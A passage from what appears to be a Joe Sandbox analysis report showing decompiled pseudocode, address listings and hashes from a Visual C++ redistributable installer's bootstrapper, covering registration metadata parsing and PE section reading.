									if(E000F4B5A(_t174, _v16, 0, _t15) >= 0) {
										_t18 = _t176 + 0x44; // 0xb5381
										if(E000F31C7(_v12, L"ProviderKey", _t18) >= 0) {
											_t20 = _t176 + 0x48; // 0xb5385
											if(E000F31C7(_v12, L"ExecutableName", _t20) >= 0) {
												if(E000F33DB(_t166, _v12, L"PerMachine", _t176) >= 0) {
													_t188 = E000F388A(_v12, L"Arp",  &_v8);
													if(_t188 == 1) {
														L71:
														_t62 = _t176 + 0x98; // 0xb53d5
														_t63 = _t176 + 0x94; // 0xb53d1
														if(E000BEBB2(_v12, _t63, _t62) >= 0) {
															_t190 = E000F388A(_v12, L"Update",  &_v20);
															if(_t190 == 1) {
																L88:
																_t112 = E000BEFE5(_t166, _t176); // executed
																_t190 = _t112;
																if(_t190 >= 0) {
																	L91:
																	L92:
																	_t167 = _v12;
																	if(_t167 != 0) {
																		 *((intOrPtr*)( *_t167 + 8))(_t167);
																	}
																	_t168 = _v8;
																	if(_t168 != 0) {
																		 *((intOrPtr*)( *_t168 + 8))(_t168);
																	}
																	_t169 = _v20;
																	if(_t169 != 0) {
																		 *((intOrPtr*)( *_t169 + 8))(_t169);
																	}
																	if(_v16 != 0) {
																		E000F54EF(_v16);
																	}
																	return _t190;
																}
																_push("Failed to set registration paths.");
																L90:
																_push(_t190);
																E000F012F();
																goto L91;
															}
															if(_t190 >= 0) {
																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
																_t68 = _t176 + 0xa0; // 0xb53dd
																_t190 = E000F31C7(_v20, L"Manufacturer", _t68);
																if(_t190 >= 0) {
																	_t70 = _t176 + 0xa4; // 0xb53e1
																	_t190 = E000F31C7(_v20, L"Department", _t70);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t72 = _t176 + 0xa8; // 0xb53e5
																		_t190 = E000F31C7(_v20, L"ProductFamily", _t72);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t74 = _t176 + 0xac; // 0xb53e9
																			_t190 = E000F31C7(_v20, L"Name", _t74);
																			if(_t190 >= 0) {
																				_t76 = _t176 + 0xb0; // 0xb53ed
																				_t190 = E000F31C7(_v20, L"Classification", _t76);
																				if(_t190 >= 0) {
																					goto L88;
																				}
																				_push("Failed to get @Classification.");
																				goto L90;
																			}
																			_push("Failed to get @Name.");
																		} else {
																			_push("Failed to get @ProductFamily.");
																		}
																	} else {
																		_push("Failed to get @Department.");
																	}
																	goto L90;
																}
																_push("Failed to get @Manufacturer.");
																goto L90;
															}
															_push("Failed to select Update node.");
															goto L90;
														}
														_push("Failed to parse software tag.");
														goto L90;
													}
													if(_t188 >= 0) {
														_t25 = _t176 + 4; // 0xb5341
														_t190 = E000F33DB(_t166, _v8, L"Register", _t25);
														if(_t190 >= 0) {
															_t27 = _t176 + 0x60; // 0xb539d
															_t190 = E000F31C7(_v8, L"DisplayName", _t27);
															if(_t190 == 0x80070490 || _t190 >= 0) {
																_t29 = _t176 + 0x64; // 0xb53a1
																_t190 = E000F31C7(_v8, L"DisplayVersion", _t29);
																if(_t190 == _t164 || _t190 >= 0) {
																	_t31 = _t176 + 0x68; // 0xb53a5
																	_t190 = E000F31C7(_v8, L"Publisher", _t31);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t33 = _t176 + 0x6c; // 0xb53a9
																		_t190 = E000F31C7(_v8, L"HelpLink", _t33);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t35 = _t176 + 0x70; // 0xb53ad
																			_t190 = E000F31C7(_v8, L"HelpTelephone", _t35);
																			if(_t190 == _t164 || _t190 >= 0) {
																				_t37 = _t176 + 0x74; // 0xb53b1
																				_t190 = E000F31C7(_v8, L"AboutUrl", _t37);
																				if(_t190 == _t164 || _t190 >= 0) {
																					_t39 = _t176 + 0x78; // 0xb53b5
																					_t190 = E000F31C7(_v8, L"UpdateUrl", _t39);
																					if(_t190 == _t164 || _t190 >= 0) {
																						_t41 = _t176 + 0x7c; // 0xb53b9
																						_t190 = E000F31C7(_v8, L"ParentDisplayName", _t41);
																						if(_t190 == _t164 || _t190 >= 0) {
																							_t43 = _t176 + 0x80; // 0xb53bd
																							_t190 = E000F31C7(_v8, L"Comments", _t43);
																							if(_t190 == _t164 || _t190 >= 0) {
																								_t45 = _t176 + 0x84; // 0xb53c1
																								_t190 = E000F31C7(_v8, L"Contact", _t45);
																								if(_t190 == _t164 || _t190 >= 0) {
																									_t190 = E000F31C7(_v8, L"DisableModify",  &_v16);
																									if(_t190 < 0) {
																										if(_t190 == _t164) {
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											_t190 = 0;
																										}
																										L65:
																										if(_t190 >= 0) {
																											_t59 = _t176 + 0x90; // 0xb53cd
																											_t190 = E000F33DB(_t166, _v8, L"DisableRemove", _t59);
																											if(_t190 == _t164) {
																												goto L71;
																											}
																											if(_t190 >= 0) {
																												 *(_t176 + 0x8c) = 1;
																												goto L71;
																											}
																											_push("Failed to get @DisableRemove.");
																											goto L90;
																										}
																										_push("Failed to get @DisableModify.");
																										goto L90;
																									}
																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
																									_t166 = 2;
																									if(_t158 != _t166) {
																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
																												_t190 = 0x8000ffff;
																												E000B37D3(_t160, "registration.cpp", 0xf6, 0x8000ffff);
																												_push(_v16);
																												_push("Invalid modify disabled type: %ls");
																												L62:
																												_push(_t190);
																												E000F012F();
																												goto L91;
																											}
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											L60:
																											_t164 = 0x80070490;
																											goto L65;
																										}
																										 *(_t176 + 0x88) = 1;
																										goto L60;
																									}
																									 *(_t176 + 0x88) = _t166;
																									goto L60;
																								} else {
																									_push("Failed to get @Contact.");
																									goto L90;
																								}
																							} else {
																								_push("Failed to get @Comments.");
																								goto L90;
																							}
																						} else {
																							_push("Failed to get @ParentDisplayName.");
																							goto L90;
																						}
																					} else {
																						_push("Failed to get @UpdateUrl.");
																						goto L90;
																					}
																				} else {
																					_push("Failed to get @AboutUrl.");
																					goto L90;
																				}
																			} else {
																				_push("Failed to get @HelpTelephone.");
																				goto L90;
																			}
																		} else {
																			_push("Failed to get @HelpLink.");
																			goto L90;
																		}
																	} else {
																		_push("Failed to get @Publisher.");
																		goto L90;
																	}
																} else {
																	_push("Failed to get @DisplayVersion.");
																	goto L90;
																}
															} else {
																_push("Failed to get @DisplayName.");
																goto L90;
															}
														}
														_push("Failed to get @Register.");
														goto L90;
													}
													_push("Failed to select ARP node.");
													goto L90;
												}
												_push("Failed to get @PerMachine.");
												goto L90;
											}
											_push("Failed to get @ExecutableName.");
											goto L90;
										}
										_push("Failed to get @ProviderKey.");
										goto L90;
									}
									_push(_v16);
									_push("Failed to parse @Version: %ls");
									goto L62;
								}
								_push("Failed to get @Version.");
								goto L90;
							}
							_push("Failed to parse related bundles");
							goto L90;
						}
						_push("Failed to get @Tag.");
						goto L90;
					}
					_push("Failed to get @Id.");
					goto L90;
				}
				_push("Failed to select registration node.");
				_push(_t179);
				E000F012F();
				goto L92;
			}




















                                                                          0x000bf86e
                                                                          0x000bf878
                                                                          0x000bf87b
                                                                          0x000bf87e
                                                                          0x000bf881
                                                                          0x000bf890
                                                                          0x000bf897
                                                                          0x000bf89f
                                                                          0x000bf8a4
                                                                          0x000bf8b8
                                                                          0x000bf8b9
                                                                          0x000bf8bc
                                                                          0x000bf8d1
                                                                          0x000bf8dd
                                                                          0x000bf8f2
                                                                          0x000bf90b
                                                                          0x000bf92c
                                                                          0x000bf938
                                                                          0x000bf94a
                                                                          0x000bf959
                                                                          0x000bf96e
                                                                          0x000bf97a
                                                                          0x000bf98f
                                                                          0x000bf9ad
                                                                          0x000bf9ca
                                                                          0x000bf9cf
                                                                          0x000bfc7e
                                                                          0x000bfc7e
                                                                          0x000bfc85
                                                                          0x000bfc98
                                                                          0x000bfcb5
                                                                          0x000bfcbc
                                                                          0x000bfd86
                                                                          0x000bfd87
                                                                          0x000bfd8c
                                                                          0x000bfd90
                                                                          0x000bfd9f
                                                                          0x000bfda0
                                                                          0x000bfda0
                                                                          0x000bfda5
                                                                          0x000bfdaa
                                                                          0x000bfdaa
                                                                          0x000bfdad
                                                                          0x000bfdb2
                                                                          0x000bfdb7
                                                                          0x000bfdb7
                                                                          0x000bfdba
                                                                          0x000bfdbf
                                                                          0x000bfdc4
                                                                          0x000bfdc4
                                                                          0x000bfdcb
                                                                          0x000bfdd0
                                                                          0x000bfdd0
                                                                          0x000bfddc
                                                                          0x000bfddc
                                                                          0x000bfd92
                                                                          0x000bfd97
                                                                          0x000bfd97
                                                                          0x000bfd98
                                                                          0x00000000
                                                                          0x000bfd9e
                                                                          0x000bfcc4
                                                                          0x000bfcd0
                                                                          0x000bfcd6
                                                                          0x000bfcea
                                                                          0x000bfcee
                                                                          0x000bfcfa
                                                                          0x000bfd0e
                                                                          0x000bfd12
                                                                          0x000bfd1f
                                                                          0x000bfd33
                                                                          0x000bfd37
                                                                          0x000bfd44
                                                                          0x000bfd58
                                                                          0x000bfd5c
                                                                          0x000bfd65
                                                                          0x000bfd79
                                                                          0x000bfd7d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bfd7f
                                                                          0x00000000
                                                                          0x000bfd7f
                                                                          0x000bfd5e
                                                                          0x000bfd3d
                                                                          0x000bfd3d
                                                                          0x000bfd3d
                                                                          0x000bfd18
                                                                          0x000bfd18
                                                                          0x000bfd18
                                                                          0x00000000
                                                                          0x000bfd12
                                                                          0x000bfcf0
                                                                          0x00000000
                                                                          0x000bfcf0
                                                                          0x000bfcc6
                                                                          0x00000000
                                                                          0x000bfcc6
                                                                          0x000bfc9a
                                                                          0x00000000
                                                                          0x000bfc9a
                                                                          0x000bf9d7
                                                                          0x000bf9e3
                                                                          0x000bf9f4
                                                                          0x000bf9f8
                                                                          0x000bfa04
                                                                          0x000bfa15
                                                                          0x000bfa19
                                                                          0x000bfa29
                                                                          0x000bfa3a
                                                                          0x000bfa3e
                                                                          0x000bfa4e
                                                                          0x000bfa5f
                                                                          0x000bfa63
                                                                          0x000bfa73
                                                                          0x000bfa84
                                                                          0x000bfa88
                                                                          0x000bfa98
                                                                          0x000bfaa9
                                                                          0x000bfaad
                                                                          0x000bfabd
                                                                          0x000bface
                                                                          0x000bfad2
                                                                          0x000bfae2
                                                                          0x000bfaf3
                                                                          0x000bfaf7
                                                                          0x000bfb07
                                                                          0x000bfb18
                                                                          0x000bfb1c
                                                                          0x000bfb2c
                                                                          0x000bfb40
                                                                          0x000bfb44
                                                                          0x000bfb54
                                                                          0x000bfb68
                                                                          0x000bfb6c
                                                                          0x000bfb8d
                                                                          0x000bfb91
                                                                          0x000bfc33
                                                                          0x000bfc35
                                                                          0x000bfc3c
                                                                          0x000bfc3c
                                                                          0x000bfc3e
                                                                          0x000bfc40
                                                                          0x000bfc4c
                                                                          0x000bfc60
                                                                          0x000bfc64
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bfc68
                                                                          0x000bfc74
                                                                          0x00000000
                                                                          0x000bfc74
                                                                          0x000bfc6a
                                                                          0x00000000
                                                                          0x000bfc6a
                                                                          0x000bfc42
                                                                          0x00000000
                                                                          0x000bfc42
                                                                          0x000bfbad
                                                                          0x000bfbb1
                                                                          0x000bfbb4
                                                                          0x000bfbd3
                                                                          0x000bfbf6
                                                                          0x000bfc06
                                                                          0x000bfc16
                                                                          0x000bfc1b
                                                                          0x000bfc1e
                                                                          0x000bfc23
                                                                          0x000bfc23
                                                                          0x000bfc24
                                                                          0x00000000
                                                                          0x000bfc29
                                                                          0x000bfbf8
                                                                          0x000bfbff
                                                                          0x000bfbff
                                                                          0x00000000
                                                                          0x000bfbff
                                                                          0x000bfbd5
                                                                          0x00000000
                                                                          0x000bfbd5
                                                                          0x000bfbb6
                                                                          0x00000000
                                                                          0x000bfb72
                                                                          0x000bfb72
                                                                          0x00000000
                                                                          0x000bfb72
                                                                          0x000bfb4a
                                                                          0x000bfb4a
                                                                          0x00000000
                                                                          0x000bfb4a
                                                                          0x000bfb22
                                                                          0x000bfb22
                                                                          0x00000000
                                                                          0x000bfb22
                                                                          0x000bfafd
                                                                          0x000bfafd
                                                                          0x00000000
                                                                          0x000bfafd
                                                                          0x000bfad8
                                                                          0x000bfad8
                                                                          0x00000000
                                                                          0x000bfad8
                                                                          0x000bfab3
                                                                          0x000bfab3
                                                                          0x00000000
                                                                          0x000bfab3
                                                                          0x000bfa8e
                                                                          0x000bfa8e
                                                                          0x00000000
                                                                          0x000bfa8e
                                                                          0x000bfa69
                                                                          0x000bfa69
                                                                          0x00000000
                                                                          0x000bfa69
                                                                          0x000bfa44
                                                                          0x000bfa44
                                                                          0x00000000
                                                                          0x000bfa44
                                                                          0x000bfa1f
                                                                          0x000bfa1f
                                                                          0x00000000
                                                                          0x000bfa1f
                                                                          0x000bfa19
                                                                          0x000bf9fa
                                                                          0x00000000
                                                                          0x000bf9fa
                                                                          0x000bf9d9
                                                                          0x00000000
                                                                          0x000bf9d9
                                                                          0x000bf9af
                                                                          0x00000000
                                                                          0x000bf9af
                                                                          0x000bf991
                                                                          0x00000000
                                                                          0x000bf991
                                                                          0x000bf970
                                                                          0x00000000
                                                                          0x000bf970
                                                                          0x000bf94c
                                                                          0x000bf94f
                                                                          0x00000000
                                                                          0x000bf94f
                                                                          0x000bf92e
                                                                          0x00000000
                                                                          0x000bf92e
                                                                          0x000bf90d
                                                                          0x00000000
                                                                          0x000bf90d
                                                                          0x000bf8f4
                                                                          0x00000000
                                                                          0x000bf8f4
                                                                          0x000bf8d3
                                                                          0x00000000
                                                                          0x000bf8d3
                                                                          0x000bf8a6
                                                                          0x000bf8ab
                                                                          0x000bf8ac
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                          • API String ID: 0-2956246334
                                                                          • Opcode ID: b57f6848b11b3f5b13518d34441e4fad7f29634ea7a0b287e0928737c927022d
                                                                          • Instruction ID: 5fc0d749ff508c23d9585d3972cf71732b82a910425e10a7c2c734e34e487dc5
                                                                          • Opcode Fuzzy Hash: b57f6848b11b3f5b13518d34441e4fad7f29634ea7a0b287e0928737c927022d
                                                                          • Instruction Fuzzy Hash: 4EE1B632E8076BBBCB22A6A0CC42EFD7AA5BB04760F514275FD50B76D1D7E15E40A780
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BB389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 bb389-bb3fd call df670 * 2 177 bb3ff-bb42a call b37d3 172->177 178 bb435-bb450 SetFilePointerEx 172->178 198 bb42f-bb430 177->198 179 bb452-bb482 call b37d3 178->179 180 bb484-bb49e ReadFile 178->180 179->198 181 bb4a0-bb4d0 call b37d3 180->181 182 bb4d5-bb4dc 180->182 181->198 184 bbad3-bbae7 call b37d3 182->184 185 bb4e2-bb4eb 182->185 202 bbaec 184->202 185->184 190 bb4f1-bb501 SetFilePointerEx 185->190 196 bb538-bb550 ReadFile 190->196 197 bb503-bb52e call b37d3 190->197 199 bb552-bb57d call b37d3 196->199 200 bb587-bb58e 196->200 197->196 203 bbaed-bbaf3 call f012f 198->203 199->200 204 bbab8-bbad1 call b37d3 200->204 205 bb594-bb59e 200->205 202->203 217 bbaf4-bbb06 call dde36 203->217 204->202 205->204 210 bb5a4-bb5c7 SetFilePointerEx 205->210 215 bb5c9-bb5f4 call b37d3 210->215 216 bb5fe-bb616 ReadFile 210->216 215->216 219 bb618-bb643 call b37d3 216->219 220 bb64d-bb665 ReadFile 216->220 219->220 223 bb69c-bb6b7 SetFilePointerEx 220->223 224 bb667-bb692 call b37d3 220->224 229 bb6b9-bb6e7 call b37d3 223->229 230 bb6f1-bb710 ReadFile 223->230 224->223 229->230 232 bba79-bbaad call b37d3 230->232 233 bb716-bb718 230->233 258 bbaae-bbab6 call f012f 232->258 238 bb719-bb720 233->238 241 bb726-bb732 238->241 242 bba54-bba71 call b37d3 238->242 247 bb73d-bb746 241->247 248 bb734-bb73b 241->248 255 bba76-bba77 242->255 252 bb74c-bb772 ReadFile 247->252 253 bba17-bba2e call b37d3 247->253 248->247 251 bb780-bb787 248->251 259 bb789-bb7ab call b37d3 251->259 260 bb7b0-bb7c7 call b38d4 251->260 252->232 257 bb778-bb77e 252->257 267 bba33-bba39 call f012f 253->267 255->258 257->238 258->217 259->255 269 bb7eb-bb800 SetFilePointerEx 260->269 270 bb7c9-bb7e6 call b37d3 260->270 279 bba3f-bba40 267->279 273 bb802-bb830 call b37d3 269->273 274 bb840-bb865 ReadFile 269->274 270->203 300 bb835-bb83b call f012f 273->300 276 bb89c-bb8a8 274->276 277 bb867-bb89a call b37d3 274->277 281 bb8cb-bb8cf 276->281 282 bb8aa-bb8c6 call b37d3 276->282 277->300 280 bba41-bba43 279->280 280->217 284 bba49-bba4f call b3999 280->284 287 bb90a-bb91d call f48cb 281->287 288 bb8d1-bb905 call b37d3 call f012f 281->288 282->267 284->217 301 bb929-bb933 287->301 302 bb91f-bb924 287->302 288->280 300->279 305 bb93d-bb945 301->305 306 bb935-bb93b 301->306 302->300 310 bb951-bb954 305->310 311 bb947-bb94f 305->311 309 bb956-bb9b6 call b38d4 306->309 314 bb9da-bb9fb call df0f0 call bb106 309->314 315 bb9b8-bb9d4 call b37d3 309->315 310->309 311->309 314->280 322 bb9fd-bba0d call b37d3 314->322 315->314 322->253
                                                                          C-Code - Quality: 67%
                                                                          			E000BB389(union _LARGE_INTEGER* __edx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				union _LARGE_INTEGER _v12;
				void _v72;
				signed short _v300;
				signed int _v314;
				void _v320;
				union _LARGE_INTEGER _v340;
				long _v344;
				void _v360;
				long _v364;
				union _LARGE_INTEGER* _v368;
				intOrPtr _v372;
				void _v376;
				void _v380;
				struct _OVERLAPPED* _v384;
				intOrPtr _v388;
				union _LARGE_INTEGER _v392;
				intOrPtr _v396;
				char _v400;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t98;
				intOrPtr _t106;
				int _t108;
				int _t117;
				int _t120;
				union _LARGE_INTEGER _t123;
				int _t124;
				int _t133;
				signed short _t137;
				intOrPtr* _t142;
				int _t151;
				intOrPtr _t160;
				signed short _t188;
				signed short _t191;
				signed short _t196;
				signed short _t199;
				signed short _t202;
				signed short _t205;
				signed short _t208;
				signed short _t211;
				signed short _t214;
				signed short _t217;
				signed short _t220;
				signed int _t224;
				void* _t226;
				intOrPtr _t237;
				void _t241;
				intOrPtr _t242;
				union _LARGE_INTEGER* _t243;
				void* _t244;
				void* _t247;
				void* _t248;
				void* _t252;
				signed int _t290;

				_t243 = __edx;
				_t98 =  *0x11a008; // 0xf77c1860
				_v8 = _t98 ^ _t290;
				_t223 = _a4;
				asm("xorps xmm0, xmm0");
				_v364 = 0;
				asm("movlpd [ebp-0x18c], xmm0");
				E000DF670(_t244,  &_v72, 0, 0x40);
				E000DF670(_t244,  &_v320, 0, 0xf8);
				_v376 = 0;
				_v380 = 0;
				_v368 = 0;
				_t224 = 0xa;
				memset( &_v360, 0, _t224 << 2);
				_t226 = _a8;
				 *_t223 = _t226;
				if(_t226 != 0xffffffff) {
					_t106 = _a12;
					_t247 = SetFilePointerEx;
					_push(0);
					_t107 =  ==  ? _t226 : _t106;
					 *((intOrPtr*)(_t223 + 4)) =  ==  ? _t226 : _t106;
					_t108 = SetFilePointerEx(_t226, 0, 0, 0); // executed
					if(_t108 != 0) {
						_t111 = ReadFile( *_t223,  &_v72, 0x40,  &_v364, 0); // executed
						if(_t111 != 0) {
							if(_v364 < 0x40) {
								L66:
								_t247 = 0x8007000d;
								_t252 = 0x8007000d;
								E000B37D3(_t111, "section.cpp", 0x4e, 0x8007000d);
								_push("Failed to find valid DOS image header in buffer.");
								L67:
								_push(_t247);
								goto L68;
							}
							_t111 = 0x5a4d;
							if(0x5a4d != _v72) {
								goto L66;
							}
							_push(0);
							asm("cdq");
							_t117 = SetFilePointerEx( *_t223, _v12.LowPart, _t243, 0); // executed
							if(_t117 != 0) {
								_t120 = ReadFile( *_t223,  &_v320, 0x18,  &_v364, 0); // executed
								if(_t120 != 0) {
									if(_v364 < 0x18 || _v320 != 0x4550) {
										_t247 = 0x8007000d;
										_t252 = 0x8007000d;
										E000B37D3(_t120, "section.cpp", 0x64, 0x8007000d);
										_push("Failed to find valid NT image header in buffer.");
										goto L67;
									} else {
										_t24 = _v12.LowPart + 0x58; // 0x58
										_t123 = _v12.LowPart + 0x98;
										_v388 = _t24;
										_push(0);
										_v392.LowPart = _t123;
										_t124 = SetFilePointerEx( *_t223, _t123, 0, 0); // executed
										if(_t124 != 0) {
											if(ReadFile( *_t223,  &_v376, 4,  &_v364, 0) != 0) {
												if(ReadFile( *_t223,  &_v380, 4,  &_v364, 0) != 0) {
													_push(0);
													_t133 = SetFilePointerEx( *_t223, _v12 + (_v300 & 0x0000ffff) + 0x18, 0, 0); // executed
													if(_t133 != 0) {
														_t247 = 0;
														_v384 = 0;
														if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
															L63:
															_t137 = GetLastError();
															_t255 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
															_t252 =  >=  ? 0x80004005 :  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
															E000B37D3(0x80004005, "section.cpp", 0x8d, _t252);
															_push(_t247);
															_push("Failed to read image section header, index: %u");
															_push(_t252);
															L64:
															E000F012F();
															goto L69;
														}
														_t237 = 1;
														while(_v364 >= 0x28) {
															_t142 =  &_v360;
															if( *_t142 != 0x7869772e ||  *((intOrPtr*)(_t142 + 4)) != 0x6e727562) {
																_t143 = _v314 & 0x0000ffff;
																if(_t237 >= (_v314 & 0x0000ffff)) {
																	_t248 = 0x8007000d;
																	_t252 = 0x8007000d;
																	E000B37D3(_t143, "section.cpp", 0xa0, 0x8007000d);
																	_push("Failed to find Burn section.");
																	goto L57;
																}
																_t247 = _t247 + 1;
																_v384 = _t247;
																_v372 = _t237 + 1;
																if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
																	goto L63;
																}
																_t237 = _v372;
																continue;
															} else {
																if(_v344 >= 0x34) {
																	_t247 = E000B38D4(_v344, 1);
																	_v368 = _t247;
																	if(_t247 != 0) {
																		_push(0);
																		_t151 = SetFilePointerEx( *_t223, _v340.LowPart, 0, 0); // executed
																		if(_t151 != 0) {
																			_v372 = _v340 + 0x1c;
																			if(ReadFile( *_t223, _t247, _v344,  &_v364, 0) != 0) {
																				_t156 = _v344;
																				if(_v344 <= _v364) {
																					if( *((intOrPtr*)(_t247 + 4)) == 2) {
																						if(E000F48CB(_t237,  *((intOrPtr*)(_t223 + 4)),  &_v400) >= 0) {
																							_t243 =  *(_t247 + 0x18);
																							 *(_t223 + 8) = _t243;
																							if( *((intOrPtr*)(_t247 + 0x20)) == 0) {
																								_t241 = _v376;
																								if(_t241 == 0) {
																									_t160 =  *((intOrPtr*)(_t247 + 0x30)) + _t243;
																								} else {
																									_t160 = _v380 + _t241;
																								}
																							} else {
																								_t160 =  *((intOrPtr*)(_t247 + 0x24)) +  *((intOrPtr*)(_t247 + 0x20));
																							}
																							 *((intOrPtr*)(_t223 + 0xc)) = _t160;
																							 *((intOrPtr*)(_t223 + 0x10)) = _v400;
																							 *((intOrPtr*)(_t223 + 0x14)) = _v396;
																							 *((intOrPtr*)(_t223 + 0x18)) = _v388;
																							 *(_t223 + 0x1c) = _v392;
																							 *((intOrPtr*)(_t223 + 0x20)) = _v372;
																							 *((intOrPtr*)(_t223 + 0x24)) =  *((intOrPtr*)(_t247 + 0x1c));
																							 *((intOrPtr*)(_t223 + 0x28)) =  *((intOrPtr*)(_t247 + 0x20));
																							 *((intOrPtr*)(_t223 + 0x2c)) =  *((intOrPtr*)(_t247 + 0x24));
																							 *((intOrPtr*)(_t223 + 0x30)) =  *((intOrPtr*)(_t247 + 0x28));
																							 *(_t223 + 0x34) =  *(_t247 + 0x2c);
																							_t242 = E000B38D4( *(_t247 + 0x2c) << 2, 1);
																							 *((intOrPtr*)(_t223 + 0x38)) = _t242;
																							if(_t242 != 0) {
																								_t93 = _t247 + 0x30; // 0x30
																								E000DF0F0(_t242, _t93,  *(_t223 + 0x34) << 2);
																								_t94 = _t247 + 8; // 0x8
																								_t252 = E000BB106(_t94);
																								if(_t252 >= 0) {
																									goto L59;
																								}
																								E000B37D3(_t178, "section.cpp", 0xf5, _t252);
																								_push("PE Header from file didn\'t match PE Header in memory.");
																								L37:
																								_push(_t252);
																								goto L38;
																							} else {
																								_t223 = 0x8007000e;
																								_t252 = 0x8007000e;
																								E000B37D3(_t172, "section.cpp", 0xef, 0x8007000e);
																								_push("Failed to allocate memory for container sizes.");
																								_push(0x8007000e);
																								L38:
																								E000F012F();
																								L58:
																								L59:
																								if(_t247 != 0) {
																									E000B3999(_t247);
																								}
																								goto L69;
																							}
																						}
																						_push("Failed to get total size of bundle.");
																						goto L37;
																					}
																					_t252 = 0x8007000d;
																					E000B37D3(_t156, "section.cpp", 0xcc, 0x8007000d);
																					E000F012F(0x8007000d, "Failed to read section info, unsupported version: %08x", _v368->LowPart.HighPart);
																					_t247 = _v368;
																					goto L59;
																				}
																				_t248 = 0x8007000d;
																				_t252 = 0x8007000d;
																				E000B37D3(_t156, "section.cpp", 0xc5, 0x8007000d);
																				_push("Failed to read complete section info.");
																				L57:
																				_push(_t248);
																				E000F012F();
																				_t247 = _v368;
																				goto L58;
																			}
																			_t188 = GetLastError();
																			_t259 =  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
																			_t252 =  >=  ? 0x80004005 :  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
																			E000B37D3(0x80004005, "section.cpp", 0xc0, _t252);
																			_push("Failed to read section info.");
																			goto L37;
																		}
																		_t191 = GetLastError();
																		_t262 =  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
																		_t252 =  >=  ? 0x80004005 :  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
																		E000B37D3(0x80004005, "section.cpp", 0xb7, _t252);
																		_push("Failed to seek to section info.");
																		goto L37;
																	}
																	_t223 = 0x8007000e;
																	_t252 = 0x8007000e;
																	E000B37D3(_t149, "section.cpp", 0xb1, 0x8007000e);
																	_push("Failed to allocate buffer for section info.");
																	_push(0x8007000e);
																	goto L68;
																}
																_t247 = 0x8007000d;
																_t252 = 0x8007000d;
																E000B37D3(_t142, "section.cpp", 0xac, 0x8007000d);
																_push(_v344);
																_push("Failed to read section info, data to short: %u");
																L62:
																_push(_t247);
																goto L64;
															}
														}
														_t247 = 0x8007000d;
														_t252 = 0x8007000d;
														E000B37D3(_t136, "section.cpp", 0x92, 0x8007000d);
														_push(_v384);
														_push("Failed to read complete image section header, index: %u");
														goto L62;
													}
													_t196 = GetLastError();
													_t265 =  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
													_t252 =  >=  ? 0x80004005 :  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
													E000B37D3(0x80004005, "section.cpp", 0x84, _t252);
													_push("Failed to seek past optional headers.");
													goto L2;
												}
												_t199 = GetLastError();
												_t268 =  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
												_t252 =  >=  ? 0x80004005 :  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
												E000B37D3(0x80004005, "section.cpp", 0x79, _t252);
												_push("Failed to read signature size.");
												goto L2;
											}
											_t202 = GetLastError();
